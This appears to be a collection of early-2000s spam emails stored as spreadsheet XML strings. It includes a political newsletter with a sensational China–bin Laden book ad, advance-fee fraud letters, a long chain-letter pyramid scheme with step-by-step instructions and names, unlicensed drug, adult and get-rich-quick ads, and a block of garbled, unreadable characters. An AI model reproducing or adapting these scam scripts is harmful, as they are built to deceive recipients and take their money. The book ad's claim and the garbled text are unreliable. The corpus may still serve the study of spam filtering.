mess. Letï¿½s hope they donï¿½t make it worse. Jennifer Hickey tells all in her 
revealing Washingtonï¿½s Week piece http://insightmag.com/news/258785.html. And Zoli Simon has discovered that the Chinese have targeted Russian cruise 
missiles at U.S. ships. Read all about it 
http://insightmag.com/news/258778.html. And guess which party is poised to 
become a major force in time for the November elections? Hint ï¿½ Itï¿½s not the 
Republicans or Democrats http://insightmag.com/news/258781.html. Along with the 
usual reliable revelations and opinions described below. ï¿½Bye for now. &gt;&gt;From the 
Bunker, I remain your newsman in Washington................................................CHINA ARMS FOR WARZoli Simon writes that China's acquisition of cruise-missile weapons systems 
from Russia poses a clear and present danger to U.S. naval forces ï¿½ and to the 
American homeland as well.http://insightmag.com/news/258778.html...............................................WASHINGTONï¿½S WEEK ï¿½ ON THE LEGISLATIVE WARPATHJennifer Hickey tells us as investor anger registered more clearly with each 
downward tick of the stock markets, legislators engaged in an indelicate 
parliamentary exchange of whoops about arcane congressional rules while they 
danced and ululated to mutual charges of chicanery.http://insightmag.com/news/258785.html...............................................TAX CODE TRAUMAJohn Berlau tells us that experts contend that simplifying the U.S. tax code 
would do more to cut down on corporate-accounting chicanery than the 
introduction of still more regulations and criminal penalties.http://insightmag.com/news/258763.html ========================================               Is Bin-Laden the Pawn of China?On September 11, 2001, a Chinese Peoples Liberation Army transport aircraft from 
Beijing landed in Kabul with the most important delegation the ruling Taliban 
had ever received.  They had come to sign the contract with Afghanistan that 
Osama bin-Laden had asked for, that would provide the Taliban state of the art 
air defense systems in exchange for the Taliban's promise to end the attacks by 
Muslim extremists in China's north-western regions.  Hours later, CIA Director 
George Tenet received a coded "red alert" message from Mossad's Tel Aviv 
headquarters that presented what he called a "worst case scenario" -- that China 
would use a ruthless surrogate, bin-Laden, to attack the United States.  In 
SEEDS OF FIRE, Gordon Thomas asks the question: In the war on terror, is China 
with us or against us?  Click here: 
http://www.conservativebookservice.com/BookPage.asp?prod_cd=C5969&amp;sour_cd=INT003901 ========================================AUSTRIA CONFRONTS ITS DARK NAZI PASTKen Timmerman writes that as a government commission prepares to release an 
inventory of property stolen from Jews by the Nazis, a new tide of anti-Semitism 
is sweeping the country.http://insightmag.com/news/258764.html...............................................ï¿½PARTY OF PRINCIPLEï¿½ GAINING GROUNDDoreen Englert says, once an afterthought on the U.S. political landscape, the 
Libertarian Party steadily has increased both in numbers and influence since its 
founding 30 years ago.http://insightmag.com/news/258781.html...............................................CHURCH EXPLORES ï¿½HARD CHANGEï¿½Jennifer Hickey writes that seeking to repair its severely damaged reputation 
and begin the healing process, the Catholic Church takes steps to implement a 
nationwide policy on sexual abuse.http://insightmag.com/news/258761.html
You have received this newsletter because you have a user name and password at 
Insight on the News.
To unsubscribe from this newsletter, visit 
"http://insightmag.com/main.cfm?include=unsubscribe". You may also log into 
Insight on the News and edit your account preferences on the Web.If you have forgotten or don't know your user name and password, it will be 
emailed to you after visiting the following link:
http://insightmag.com/main.cfm?include=emailPassword&amp;serialNumber=16oai891z5&amp;email=cypherpunks@ssz.com--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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http://61.129.68.19/user0201/index.asp?Afft=QM3=========================================================To Unsubscribe: http://61.129.68.19/light/watch.asp--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Your application for the Grant is below.  Remember, because of the type of Grant this is, you will never need to repay!&gt;&gt;Time is limited. &lt;&lt;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higher!APPLY NOW! 
Deadline is almost here! 
</t>
  </si>
  <si>
    <t xml:space="preserve">Government Grants E-Book 2002 editionYou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credit.Please Visit Our Website
And Place Your  Order TODAY! CLICK HERE Â We apologize for any email you may have inadvertently received.
Please CLICK HERE to be removed from future mailings. [IYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">
ï¿½ï¿½ï¿½sï¿½xï¿½Wï¿½ï¿½ï¿½uï¿½ï¿½ï¿½Wï¿½ï¿½ï¿½ï¿½ï¿½sï¿½xï¿½Wï¿½ï¿½ï¿½uï¿½ï¿½ï¿½Wï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½\ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Pï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½Qï¿½uï¿½ï¿½ï¿½Pï¿½Iï¿½ï¿½ï¿½}ï¿½{ï¿½ï¿½ï¿½ï¿½ ?
ï¿½Cï¿½ï¿½ï¿½ï¿½ï¿½Lï¿½ï¿½ï¿½uï¿½@ï¿½ï¿½ï¿½Aï¿½Lï¿½vï¿½}ï¿½oï¿½sï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ ?
ï¿½oï¿½ï¿½ï¿½ï¿½ï¿½xï¿½Wï¿½ï¿½ï¿½sï¿½@ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½qï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½Aï¿½Xï¿½U
ï¿½ï¿½ï¿½~ï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½qï¿½ï¿½ï¿½ï¿½ï¿½wï¿½ï¿½ï¿½qï¿½tï¿½C ï¿½ï¿½                   
ï¿½ï¿½ï¿½ï¿½ï¿½uï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½wï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Uï¿½ï¿½
ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½Uï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Cï¿½Lï¿½]ï¿½lï¿½Hï¿½ï¿½ï¿½ï¿½ï¿½Bï¿½Hï¿½ï¿½ï¿½Eï¿½Eï¿½^
ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½]ï¿½ï¿½ï¿½@ï¿½sï¿½ï¿½ï¿½Bï¿½ï¿½ï¿½qï¿½Wï¿½ï¿½ï¿½Bï¿½tï¿½dï¿½Hï¿½B                   
Â  Â Â  ï¿½ï¿½ï¿½ï¿½ï¿½Bï¿½Bï¿½aï¿½}ï¿½Bï¿½]ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Bï¿½ï¿½ï¿½~ï¿½Oï¿½^
ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½zï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½dï¿½ï¿½ï¿½\ï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½Kï¿½jï¿½M
ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½wï¿½iï¿½dï¿½ï¿½ï¿½Bï¿½ï¿½ï¿½ï¿½ï¿½Bï¿½Rï¿½ï¿½ï¿½Bï¿½Cï¿½L
ï¿½ï¿½ ï¿½tï¿½Kï¿½Oï¿½ï¿½ï¿½ï¿½ï¿½Qï¿½Xï¿½Mï¿½ï¿½ï¿½ï¿½ï¿½nï¿½ï¿½ï¿½ï¿½ï¿½vï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½nï¿½ï¿½ï¿½Hï¿½ï¿½ï¿½Hï¿½G
ï¿½ï¿½ï¿½~ï¿½Wï¿½ï¿½ï¿½G
ï¿½uï¿½ï¿½ï¿½ï¿½ï¿½ï¿½CDï¿½Hï¿½ï¿½ï¿½aï¿½}ï¿½Gï¿½ï¿½ï¿½vï¿½qï¿½ï¿½ï¿½GÂ Â      
  ï¿½Iï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½G
ï¿½fï¿½ï¿½ï¿½Iï¿½O
ï¿½qï¿½ï¿½ï¿½ï¿½ï¿½qï¿½qï¿½ï¿½ï¿½GÂ 
Â 
ï¿½ï¿½ï¿½ï¿½ï¿½qï¿½ï¿½ï¿½GÂ Â Â         
  ï¿½uï¿½ï¿½ï¿½ï¿½500ï¿½ï¿½ï¿½tï¿½Bï¿½OÂ         
  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</si>
  <si>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Financial Services Company will pay a minimum of $250.00 (max. of $1000.00) for every lead that results in a sale.  Currently many of our Telemarketers are earning more than $5000.00 a month!For more information call (402) 996-9002 and leave your contact information.  We will get in touch with you within 2-3 business days.**Please note that we do not provide any training or resources to Telemarketers**To unsubscribe please send us an email with "UNSUBSCRIBE" in the subject line to: telemark_0702@hotmail.com.iqlexmqjxwsuwvipkjuuknnxif--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Proven 6 Year Old Better Business Registered Company Provides 
A REAL And Legitimate Opportunity To Make Some SERIOUS MONEY!GLOBAL OPPORTUNITIES! (Around The World)No Selling!			
No Phone Calls!			
No Recruiting!
No Meetings To Attend!
80% Pay Out!  (No Kidding)
PAYS WEEKLY!Spillover, Spillover, Spillover, From Our Massive Advertising Programs!!
Membership Includes, Immediate FREE Money Making Website!NO EXPERIENCE REQUIRED...ALL YOU NEED TO DO IS ENROLL...
ANYONE CAN DO THIS...THAT MEANS ANYONE!
                                                                                                                                                        ANYONE CAN DO THIS!
Check out: http://www.worldbizservices.net/money/retireWill Also Receive Information On a NEW Ground Floor Program!!
Earn $100, $200, $400, $800, $1600, $3200, $6400, Ect. Per Month!
ALSO PAYS WEEKLY! (100% GUARANTEED)
-----------------------------------------------------------------------------------------------------------------"You are receiving this e-mail because you have purchased something online
 or signed up for information over the last 6 months. If you would like to be
 removed  from this list send an e-mail to mresidual3@excite.com, and put
remove in the subject line."  
2693CYCh6-467VCaV9333LtvW4-049ChsA2496Lhcg4-87l43--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Hi Friend,
ezDebtConsolidationInfo.com
-----------------------------------------------------------
Is your debt causing you problems?
      CONSOLIDATE YOUR DEBTS!
and...
* Pay one monthly payment that you can afford
* Reduce interest rates, paying off your debt sooner
* Avoid the consequences of bankruptcy
* Answer your phone calls without fear!
http://click.mm53.com/sp/t.pl?id=3120:7552100
Click Here for A Free Evaluation!
or type http://click.mm53.com/sp/t.pl?id=3122:7552100 into your browser.
------------------------------------------------------------
Remove yourself from this recurring list by sending a blank email to
mailto:unsub-7552100-311@mm53.comOR Sending a postal mail to:
Customer Service
427-3 Amherst Street, Suite 319
Nashua, NH 03063This message was sent to address cypherpunks@einstein.ssz.com--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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NOW ON SALE FOR $129.00Â  10 100 MG TABLETS************MEN'S  VIAGRA *******************VIAGRA
PropeciaWOMEN'S
Ortho Tri-Cyclen
Vaniqa
Renova
Retin-Ahttp://myrxexpress.com/index.asp?affiliate=CHOM33
WEIGHT LOSS
XenicalGENERAL
Valtrex
Acyclovir
ZybanBEST PRICES FAST DELIVERY
NO CONSULTATION FEE!
NO DISPERSION FEE!
NO TRICKS !!!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http://myrxexpress.com/index.asp?affiliate=CHOM33
Â 
If you received this email in error we apologize for any inconvenience To  be removed from
our mailing list please Click Here mailto:ttessr@hotmail.com?Subj=Remove address 
to send email with the subject remove
Sorry for any inconvenience.  All removal requests are handled as soon as possibleÂ hcpfakmooysjlmqrudocrqrah-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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IMPORTANT NOTICE:  Regarding your domain name*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.comWe thought you'd find the article on .ws below interesting. 
If you want more information on where to register .ws "web site"
domains, and how to get a discount on multiple registrations, 
contact us at  http://www.netleads.ws/morganAlso, if you would like to increase traffic to your web site, 
by submitting your URL to 500+ search engines and directories
at once, then call us today.Sincerely,
Joe &amp; Stacy Morgan
+1.888.660.0625
Internet Names, LLC.
#########################
NEWS RELEASE:
.WS (WebSite) Domains Strikes Landmark Deal:GDI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road.To be be removed  http://www.netleads.ws/remove
</t>
  </si>
  <si>
    <t xml:space="preserve">To: yyyy@netnoteinc.com
############################################
#                                          #
#       Adult Online Super Store           #
#              Shhhhhh...                  #
#     You just found the Internet's        #
#          BEST KEPT SECRET!!!             #
#    3 Vivid DVDs Absolutely FREE!!!       #
#                                          #
############################################
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;NO PURCHASE NECESSARY! &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;If you haven't seen it yet... we are offering a
new weekly selection absolutely FREE Adult DVDs
AND VIDEOS NO PURCHASE NECESSARY!!!!! GO TO: http://209.203.162.20/8230/Everything must go!!! Additional Titles as
low as $6.97&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;NO PURCHASE NECESSARY! &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;############################################
#                                          #
#  Don't forget to forward this email to   #
#  all your friends for the same deal...   #
#  There is a new free DVD and VHS video   #
#  available every week for your viewing   #
#  pleasure.                               #
#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removal.This e-mail is sent in compliance with the Information Exchange Promotion 
and Privacy Protection Act. section 50 marked as 'Advertisement' with valid 
'removal' instruction.flblngvdydqtyinmtdhgqenainecyhixfrey
</t>
  </si>
  <si>
    <t xml:space="preserve">Gooday,With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you.If you accept to assist me, all I want you to do for me, is to make an arrangements with the security company to clear the box containing the money from their office here in the Netherlands, and then we will transfer the money into an account. You may open a new account for this purpose. I have applied to the security company to transfer the box from South Africa to their branch here, which they have done. To legally process the claim of the box, I will contact a lawyer to help me prepare a change of ownership and letter of authority to enable them recognise you as my representative, and deliver the box to you. I have with me, the certificate used to deposit the box, which we will need for claiming the box. For valuable assistance, I am offering you 10%($1,450,000) of the total money. I have also set aside 1%($145,000) of this money for all kinds of expenses that come our way in the process of this transaction, and 4%($580,000), will be given to Charity in my master's name I will give 25% ($3,625,000) to Valerie and Diana, after my share of the money has been transfered back to me. When they grant my asylum application, my share of the money (85%), will be transfered back to me, into an account I will solely own. I also intend to start up a business then. If you have knowledge of farming business in your country, or other areas of possible business investment that I may be interested in, please inform me, so that my some of my share of the money can be invested for the time being.Please, I want to you maintain absolute secrecy for the purpose of this transaction due to my safety and successful conclusion of the transaction. I look forward to your reply and co-operation, and I am sure it will be nice to extend ties with you.Yours sincerely,
Donald Phiri.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</si>
  <si>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Down!"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Â Â 
- Ricardo &amp; Isabelle P. of Las Vegas, NV
SUPER
                    VigoralFor
                    Men
SUPER                    VigoretteFor
                    Women
SUPER
VigorgelFor
                    Everyone!All
      Only  $24.99 each &amp; Get FREE Shipping!*-LIMITED
      TIME OFFER-
-&gt;
      CLICK
      HERE TO ORDER NOW! &lt;-Â Your
      email address was obtained from an opt-in list, Opt-in MRSA List  Â Purchase
      Code # 248-3-550.Â Â If you wish to be unsubscribed from this list, please
      Click
      here and press send to be removed. If you have previously
      unsubscribed and are still receiving this message, you may email our Abuse
      Control Center. We do not condone spam in any shape or form. Thank You
      kindly for your cooperation
*Note: free shipping on orders of
three or more of any product.--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Norton 
          SystemWorks 2002 Software Suite
          Professional Edition6 
          Feature-Packed Utilities, 
1 Great Price
          A  $300.00+ Combined Retail Value for Only 
$29.99!
          Includes  FREE Shipping!Don't 
        allow yourself to fall prey to destructive virusesProtect 
        your computer and your valuable information
CLICK HERE 
      FOR MORE INFO AND TO ORDER    _______________________________________________________________________________
We hope you enjoy 
receiving Marketing Co-op's special offer emails. You have received this 
special offer because you have provided permission to receive third party email 
communications regarding special online promotions or offers. However, if you 
wish to unsubscribe from this email list, please click here. 
Please allow 2-3 weeks for us to remove your email address. You may receive 
further emails from
us during that time, for which we apologize. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">BARRISTER ADEWALE COKER CHAMBERS
Legal Practitioners / Notary Public
Blk 804- Law House Building
Lagos-Nigeria.For your kind attention,
              REQUEST FOR ASSISTANCE
It is my humble pleasure to write you this letter irrespective of the fact that you do not know me.  However,I am in search of a reliable and trustworthy person that can handle a confidential transaction of this nature.I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Company.Note,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FaithfullyBARRISTER ADEWALE COKER.--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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herejrennie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</si>
  <si>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BARRISTER ADEWALE COKER CHAMBERS
Legal Practitioners / Notary Public
Blk 804- Law House Building
Lagos-Nigeria.For your kind attention,
              REQUEST FOR ASSISTANCE
It is my humble pleasure to write you this letter irrespective of the fact that you do not know me.  However,I am in search of a reliable and trustworthy person that can handle a confidential transaction of this nature.I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FaithfullyBARRISTER ADEWALE COKER.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Double the Speed of Your Computer!
Remove yourself from this list by either:
  Entering your email address below and clicking REMOVE:
OR
  Reply to this message with the word "remove" in the subject line.
  This message was sent to address cypherpunks@einstein.ssz.com
pmguid:1dx.2qe5.fsi52--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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http://www205.wiildaccess.com/hgh/
**************************************************
If you want to get removed
from our list please email at- affiliateoptout@btamail.net.cn
(subject=remove "your email")
**************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Remove yourself from this recurring list by:Clicking here to send a blank email to unsub-7552100-335@mm53.comORSending a postal mail to CustomerService, 427-3 Amherst Street, Suite 319, Nashua, NH 03063This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</si>
  <si>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Cards In Advance
&lt;!--
A:link {text-decoration: none; font-size : 10pt; color: #0004B2}
A:link.small {text-decoration: none; font-size : 10pt; color: #0004B2}
A:link.white {text-decoration: none; font-size : 10pt; color: #F5F1F1}A:visited {text-decoration: none; font-size : 10pt; color: #0004B2}
A:visited.small {text-decoration: none; font-size : 10pt; color: #0004B2}
A:visited.white {text-decoration: none; font-size : 10pt; color: #F5F1F1}A:active {text-decoration: none; font-size : 10pt}A:hover {text-decoration: underline; font-size : 10pt; color: #CC0000 }
A:hover.small {text-decoration: underline; font-size : 10pt; color: #CC0000 }
A:hover.white {text-decoration: none; font-size : 10pt; color: #CC00000}td {font-family: Verdana; font-size: 10pt}
input {font-size: 10px; background: #FFFFFF;}
option {font-size: 10px; background: #FFFFFF;}
select {font-size: 10px; background: #FFFFFF;}
textarea {font-family: Verdana; font-size: 10pt}body {
font-family: Verdana, Helvetica, sans-serif; font-size: 10pt
margin-top: 0px;
margin-left: 5px;
margin-right: 0px;
margin-bottom: 0px;
scrollbar-face-color: #95BFE7;
scrollbar-shadow-color: #DEEBF7;
scrollbar-highlight-color: #ffffff;
scrollbar-3dlight-color: #717171;
scrollbar-darkshadow-color: #103884;
scrollbar-track-color: #F1F5F9;
scrollbar-arrow-color: #103884;
}.w {color: #FFFFFF}
.title {font-weight: bold;  font-family: Verdana; font-size: 12pt}
.subtitle {font-weight: bold;  font-family: Verdana; font-size: 11pt}
.small {font-family: Verdana; font-size: 8pt}
.sb {font-family: Verdana; font-weight: bold; font-size: 8pt}
.esb {font-family: Verdana; font-weight: bold; font-size: 7pt}
.bi {font-weight: bold; font-style: italic}
.rating {font-weight: bold; font-family: Verdana; font-size: 16pt; color: #C0000E}
.web {font-family: Webdings; font-size: 18pt; color: #C0000E}.button {font-size: 10pt; color: #000000; background: #CECECE;}
--&gt;
Birthday
Anniversary
Get Well Soon
Thinking of you
Congratulations
Sympathy
Engagement
Good Luck
New Baby
New Home
Love &amp; Romance
Friendship
Retirement
Graduation
Thank You
Valentine's Day (Feb)
Passover (Apr)
Easter (Apr)
Mother's Day (May)
Father's Day (Jun)
Rosh Hashana (Sep)
Halloween (Oct)
Thanksgiving (Nov)
Christmas (Dec)
Happy New Year (Dec)
Hanukkah (Dec)Â 
You received this email because you signed up at one of Cards In Advance's websites or you signed up with a party that has contracted with Cards In Advance. To unsubscribe from the Cards In Advance mailing list please reply to this email with "remove" as the subject.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">IMPORTANT NOTICE:  Regarding your domain name*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.comWe thought you'd find the article on .ws below interesting. 
If you want more information on where to register .ws "web site"
domains, and how to get a discount on multiple registrations, 
contact us at  http://www.netleads.ws/morganAlso, if you would like to increase traffic to your web site, 
by submitting your URL to 500+ search engines and directories
at once, then call us today.Sincerely,
Joe &amp; Stacy Morgan
+1.888.660.0625
Internet Names, LLC.
#########################
NEWS RELEASE:
.WS (WebSite) Domains Strikes Landmark Deal:GDI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road.To be be removed  http://www.netleads.ws/remove--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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From: whenopportunityknocksssss@yahoo.com
To: 					
Subject: Earn money sending e-mails.  It's easy!
	     NEW IMPROVED reportsDear Friend,You can earn a lot of money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LEGAL.Just read the next few paragraphs and see what you think. If you
like what you read, great! If you don't, read it again because you
must have missed something."AS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 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 With network marketing you have two sources of income. Direct
commissions from sales you make yourself and commissions from
sales made by people you introduce to the business. Residual income is the secret of the wealthy. It means investing
time and money once, and getting paid again and again and again.
In network marketing, it also means getting paid for the work of
others. The enclosed information is something I almost let slip through my
fingers. Fortunately, sometime later I reread everything and gave
some thought and study to it.My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 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 But like I was saying, in December I received this program. I
didn't send for it, or ask for it; they just got my name off a
mailing list. THANK GOODNESS FOR THAT!!! 
After reading it several times, to make sure I was reading it
correctly, I couldn't believe my eyes. Here was a MONEY MAKING PHENOMENON. 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 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 Your first goal is to receive at least 20 orders for Report #1
within 2 weeks of your first program going out. IF YOU DON'T, SEND
OUT MORE PROGRAMS UNTIL YOU DO. Your second goal is to receive at least 150+ orders for Report #2
within 4 weeks. IF NOT, SEND OUT MORE PROGRAMS UNTIL YOU DO. Once you have your 150 orders, relax, you've met your goal. You
will make $50,000+ but keep at it! If you don't get 150 right off,
keep at it! It may take some time for your down line to build.
Keep at it, stay focused, and do not let yourself get distracted. In less than one week, I was starting to receive orders for REPORT
#1. I kept at it - kept mailing out the program and by January 13,
1 had received 26 orders for REPORT #1. My first step in making
$50,000 in 90 days was done. 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 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 If you are a fellow business owner and are in financial trouble
like I was, or you want to start your own business, consider this
a sign. I DID!  -Sincerely,  Jonathan Rourke P.S.  Do you have any idea what 11,700 $5 bills ($58,000) look
like piled up on a kitchen table? IT'S AWESOME!A PERSONAL NOTE FROM THE ORIGINATOR OF THIS PROGRAM: By the time you have read the enclosed program and reports, you
should have concluded that such a program, and one that is legal,
could not have been created by an amateur. Let me tell you a little about myself. I had a profitable business
for 10 years. Then in 1979 my business began falling off. I was
doing the same things that were previously successful for me, but
it wasn't working. Finally, I figured it out. It wasn't me; it was the economy.
Inflation and recession had replaced the stable economy that had
been with us since 1945. I don't have to tell you what happened to the unemployment
rate...because many of you know from first hand experience. There
were more failures and bankruptcies than ever before. The middle class was vanishing. Those who knew what they were
doing invested wisely and moved up. Those who did not including
those who never had anything to save or invest were moving down
into the ranks of the poor. As the saying goes, 'THE RICH GET RICHER AND THE POOR GET POORER."
The traditional Methods of making money will never allow you to
"move up" or "get rich". Inflation will see to that. You have just received information that can give you financial
freedom for the rest of your life, with "NO RISK"and "JUST A
LITTLE BIT OF EFFORT." You can make more money in the next few
months than you have ever imagined. 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 Remember though, the more you send out the more potential
customers you will reach. So my friend, I have given you the ideas, information, materials
and opportunity to become financially independent.  IT IS UP TO
YOU NOW! "THINK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 HERE'S HOW THIS AMAZING PROGRAM WILL MAKE YOU THOUSANDS OF DOLLAR$ This method of raising capital REALLY WORKS 100% EVERY TIME. I am
sure that you could use up to $50,000 or more in the next 90 days. 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 This is the GREATEST Multi-Level Mail Order Marketing anywhere:
This is what you MUST do. 1. Order all 5 reports shown on the list below (You can't sell
them if you don't have them). * For each report, send $5.00 CASH, the NAME &amp; NUMBER OF THE
REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR NAME &amp;
RETURN ADDRESS (in case of a problem). *MAKE SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE - IN CASE OF
ANY MAIL PROBLEMS! * When you place your order, make sure you order each of the five
reports. You need all five reports so that you can save them on
your computer and resell them. * Within a few days you will receive, via e-mail, each of the five
reports. Save them on your computer so they will be accessible for
you to send to the 1,000's of people who will order them from you. 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 a. Look below for the listing of available reports. b. After you've ordered the. five reports, take this Advertisement
and remove the name and address under REPORT #5. This person has
made it through the cycle and is no doubt counting their $50,000! c. Move the name and address under REPORT #4 down to REPORT #5. d. Move the name and address under REPORT #3 down to REPORT #4. e. Move the name and address under REPORT #2 down to REPORT #3 f. Move the name and address under REPORT #1 down to REPORT #2. g. Insert your name and address in the REPORT #1 position. Please make sure you copy every name and address ACCURATELY! Copy
and paste method works well,.3. Take this entire letter, including the modified list of names,
and save it to your computer. Make NO changes to the Instruction
portion of this letter. Your cost to participate in this is practically nothing (surely
you can afford $25). You obviously already have an Internet
Connection and e-mail is FREE! To assist you with marketing your business on the internet, the 5
reports you purchase will provide you with invaluable marketing
information which includes how to send bulk e-mails, where to find
thousands of free classified ads and much, much more. Here are two primary methods of building your downline: METHOD #1: SENDING BULK E-MAIL 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 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alone!Your total income in this example is $50 + $500 + $5,000+ $50,000
+ $500,000 for a total of $555,550!!! REMEMBER FRIEND, THIS IS ASSUMING 1,990 OUT OF THE 2,000 PEOPLE
YOU MAIL TO WILL DO ABSOLUTELY NOTHING AND TRASH THIS PROGRAM!
DARE TO THINK FOR A MOMENT WHAT WOULD HAPPEN IF EVERYONE, OR HALF
SENT OUT 100,000 PROGRAMS INSTEAD OF 2,000. Believe me, many
people will do just that and more! REPORT #2 will show you the best methods for bulk e-mailing, and
e-mail software. METHOD #2 - PLACING FREE ADS ON THE INTERNET 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 1st level-your 10 members with $5 ....... $50 
2nd level-10 members from those 10 ($5 x 100) ....... $500 
3rd level-10 members from those 100 ($5 x 1,000).......  $5,000 
4th level-10 members from those 1,000 ($5 x 10k) .......  $50,000 
5th level-10 members from those 10,000 ($5 x 100k) .......  $500,000THIS TOTALS     -      $555,550 Remember friends, this assumes that the people who participate
only recruit 10 people each. Think for a moment what would happen
if they got 20 people to participate! Most people get 100's of
participants. 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 AVAILABLE REPORTS         *** Order Each REPORT by NUMBER, AND
NAME ***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 PLACE YOUR ORDER FOR THESE REPORTS NOW: REPORT #1 "The Insiders Guide to Advertizing for Free on the
Internet" ORDER REPORT #1 FROM: 
Randy Dillard
P.O. Box 8 
Osprey, FL 34229 
USA 
REPORT #2 "The Insiders Guide to Sending Bulk Email on the
Internet" ORDER REPORT #2 FROM:  
Carla Brown
P.O. Box 39093
Sarasota, FL 34238
USA
REPORT #3 "The Secrets to Multilevel Marketing on the Internet" ORDER REPORT #3 FROM: 
Glynn Schmidt 
P.O. Box 19424
Sarasota, FL  34276
USA
REPORT #4 'How to become a Millionaire utilizing the Power of
Multilevel Marketing and the Internet" ORDER REPORT #4 FROM: 
Christin Joy
CPO 2398
501 E. College Avenue
Wheaton, IL 60187
USA
REPORT #5 "How to Send One Million E-Mails for Free."ORDER REPORT #5 FROM: 
Cheri Gerhart
81719 Lido Avenue
Indio, CA 92201
USA
About 50,000 new people get online every month! ******* TIPS FOR SUCCESS ******* * TREAT THIS AS YOUR BUSINESS! Be prompt, professional, and follow
the directions accurately. * Send for the five reports IMMEDIATELY so you will have them when
the orders start coming in. When you receive a $5 order, you MUST
send out the requested product/report. * ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE. * Be patient and persistent with this program. If you follow the
instructions exactly, your results WILL BE SUCCESSFUL! * ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED! ******* YOUR SUCCESS GUIDELINES ******* Follow these guidelines to guarantee your success: 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 If you don't receive 20 orders for REPORT #1 within two weeks,
continue advertising or sending e-mails until you do. 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 Before you make your decision as to whether or not you participate
in this program, answer one question ...
DO YOU WANT TO CHANGE YOUR LIFE? If the answer is yes, please look
at the following facts about this program: 1. YOU ARE SELLING A PRODUCT WHICH DOES NOT COST ANYTHING TO
PRODUCE! 2. YOU ARE SELLING A PRODUCT WHICH DOES NOT COST ANYTHING TO SHIP! 3. YOU ARE SELLING A PRODUCT WHICH DOES NOT COST YOU ANYTHING TO
ADVERTISE! 4. YOU ARE UTILIZING THE POWER OF THE INTERNET AND THE POWER OF
MULTI-LEVEL MARKETING TO DISTRIBUTE YOUR PRODUCT ALL OVER THE
WORLD! 5. YOUR ONLY EXPENSES OTHER THAN YOUR INITIAL $25 INVESTMENT IS
YOUR TIME! 6. VIRTUALLY ALL OF THE INCOME YOU GENERATE FROM THIS PROGRAM IS
PURE PROFIT! 7. THIS PROGRAM WILL CHANGE YOUR LIFE FOREVER. ******* TESTIMONIALS******* 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 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 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 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 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 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 IT IS UP TO YOU NOW!  Take 5 minutes to Change Your Future!ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR ROAD TO FINANCIAL
FREEDOM! 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 Under Bill S1618 Title HI passed by the 105th US Congress this
letter cannot be considered spam as long as the sender includes
contact information and a method of removal. This is a one time
e-mail transmission. No request for removal is necessary  To
remove (even though this is not necessary) press
whenopportunityknocksssss@yahoo.comSTOP! If you never read another e-mail PLEASE take a moment to
read this one.  This really is worth your valuable time.  Even if
you never got involved in the program, the reports themselves are
well worth the money.  They can help you start and advertise ANY
business on the internet.  That is, these reports stand alone and
are beneficial to anyone wishing to do business on the internet.At the very least PRINT THIS OUT NOW to read later if you are
pressed for time.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</si>
  <si>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Email Marketing&lt;!--
			span.bug { color: black; font-size: 9px; line-height: 9px; font-family: Arial, Helvetica, sans-serif }--&gt;The power of Email MarketingEmail Marketing is spreadingÂ around the wholeÂ world                   
  because of itsÂ high effectiveness,Â                  
  speedÂ andÂ low cost.                  
  Now if you want to introduce and sell your product or service,Â look for                   
  aÂ partner toÂ raise                   
  your website's reputation. The best way would be for youÂ toÂ useÂ email                   
  to contact your        
  targeted customer (of course,first,Â youÂ have toÂ know their email addresses). 
Targeted Email is no doubt veryÂ  effective.Â                    
  If you can introduce your product or serviceÂ                   
